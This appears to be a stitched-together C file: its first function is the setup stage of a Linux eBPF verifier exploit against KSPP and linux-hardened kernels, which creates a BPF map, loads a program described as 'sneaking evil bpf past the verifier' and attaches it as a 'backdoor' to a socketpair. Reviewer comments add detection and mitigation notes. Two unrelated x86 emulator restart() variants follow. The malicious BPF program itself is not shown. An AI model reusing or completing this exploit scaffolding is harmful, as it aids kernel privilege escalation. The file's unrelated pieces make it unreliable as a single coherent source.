/*
 * Exploit bootstrap.  The page's own banner strings give the context: a bpf
 * verifier bug on "counterfeit grsec kernels such as KSPP and
 * linux-hardened", and the banner states the authentic grsecurity kernel is
 * not affected.  Everything in this function is setup only; the BPF program
 * itself comes from load_prog(), which is defined elsewhere and not shown.
 *
 * Sequence, each step aborting through fail() on error:
 *   1. create a BPF_MAP_TYPE_ARRAY map (3 entries, int key, long long value)
 *   2. load the BPF program; EACCES is treated as a verifier rejection and
 *      bpf_log_buf (filled elsewhere) is printed
 *   3. create an AF_UNIX / SOCK_DGRAM socketpair
 *   4. attach the program to sockets[1] with SO_ATTACH_BPF
 *
 * Defender notes:
 *   - The observable pattern is bpf() map-create / prog-load calls followed
 *     by SO_ATTACH_BPF on a freshly created socketpair; bpf() syscall
 *     auditing and the verifier log are where it surfaces.
 *   - If this runs without privilege (the banner implies it does — confirm),
 *     kernel.unprivileged_bpf_disabled=1 stops steps 1 and 2 before the
 *     program ever reaches the verifier.
 *   - NOTE(review): in the EACCES branch strerror(errno) is evaluated after
 *     msg(), which may clobber errno, so the printed reason can be wrong.
 *
 * Globals written: mapfd, progfd, sockets[] (all declared elsewhere).
 * Helpers info(), redact(), msg(), fail(), load_prog(), bpf_create_map()
 * are project-local; fail() is presumably non-returning — verify.
 */
void initialize() {
    info("\n");
    info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
    info("\n");
    info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
    info("\n");

    /* Step 1: array map, 3 slots, int key -> long long value, no flags. */
    redact("creating bpf map\n");
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
    if (mapfd < 0) {
        fail("failed to create bpf map: '%s'\n", strerror(errno));
    }

    /* Step 2: program load.  Only EACCES triggers the log dump. */
    redact("sneaking evil bpf past the verifier\n");
    progfd = load_prog();
    if (progfd < 0) {
        if (errno == EACCES) {
            msg("log:\n%s", bpf_log_buf);
        }
        /* NOTE(review): msg() above may already have changed errno. */
        fail("failed to load prog '%s'\n", strerror(errno));
    }

    /* Step 3: socketpair() returns non-zero on failure. */
    redact("creating socketpair()\n");
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
        fail("failed to create socket pair '%s'\n", strerror(errno));
    }

    /* Step 4: after this, data received on sockets[1] is passed through
     * the attached program. */
    redact("attaching bpf backdoor to socket\n");
    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
        fail("setsockopt '%s'\n", strerror(errno));
    }
}
/*
 * Reset the emulated machine and reload the program (first variant).
 *
 * Statement order is the same as the original and matters: the loader
 * image is copied into guest memory and the TLB reset first, then the
 * architectural registers are put into their reset state, then the
 * program is loaded and the DRAM model initialised.  All state lives in
 * the global `cpu` and the memory model; nothing is returned.
 *
 * Assumes LOADER_START + loader_len fits inside emulated memory — TODO
 * confirm against hwa_to_va() and the configured memory size.
 */

/* Reset state: real mode, paging off, interrupts masked, flags = 0x2. */
static void reset_general_registers(void)
{
    cpu.eip = LOADER_START;
    cpu.ebp = 0;
    cpu.esp = 0x8000000;
    cpu.eflags = 0x2;
    cpu.eax = 0;
    cpu.ecx = 0;
    cpu.edx = 0;
    cpu.cr0.paging = 0;
    cpu.cr0.protect_enable = 0;
    cpu.INTR = 0;
    FLAG_CHG(IF, 0);   /* macro from elsewhere; presumably clears IF in eflags */
}

/* Empty GDT and PE cleared via the indexed cr[] view as well (cr0 and
 * cr[0] look like two views of the same register — confirm). */
static void reset_segment_state(void)
{
    cpu.gdtr.limit = 0;
    cpu.gdtr.base = 0;
    cpu.cr[0] = 0;
}

void restart() {
    memcpy(hwa_to_va(LOADER_START), loader, loader_len);
    tlb_init();
    reset_general_registers();
    reset_segment_state();
    load_prog();
    init_dram();
}
/*
 * Reset the emulated machine and reload the program (second variant).
 *
 * Order is preserved from the original: load the program, copy the loader
 * image into guest memory, set the entry registers, then bring up the
 * memory hierarchy (DRAM, two cache levels, TLB).  Finally the cached CS
 * limit is widened directly; the original author's note says the segment
 * descriptor at 0x90901700 could not be written, so seg_cache[1] is set
 * instead.  Works entirely on globals; returns nothing.
 *
 * Assumes LOADER_START + loader_len fits inside emulated memory — TODO
 * confirm against hwa_to_va() and the configured memory size.
 */

/* Entry state: execute from LOADER_START with an empty frame and flags = 2. */
static void set_entry_state(void)
{
    cpu.eip = LOADER_START;
    cpu.ebp = 0;
    cpu.esp = 0x8000000;
    cpu.eflags = 2;
}

/* DRAM first, then L1, L2, TLB — keep this order. */
static void init_memory_hierarchy(void)
{
    init_dram();
    init_cache1();
    init_cache2();
    init_TLB();
}

void restart() {
    load_prog();
    memcpy(hwa_to_va(LOADER_START), loader, loader_len);
    set_entry_state();
    init_memory_hierarchy();
    /* Widen the cached CS limit instead of editing the GDT entry in
     * memory (the in-memory descriptor at 0x90901700 could not be
     * modified, per the original note). */
    seg_cache[1].limit = 0xffffffff;
}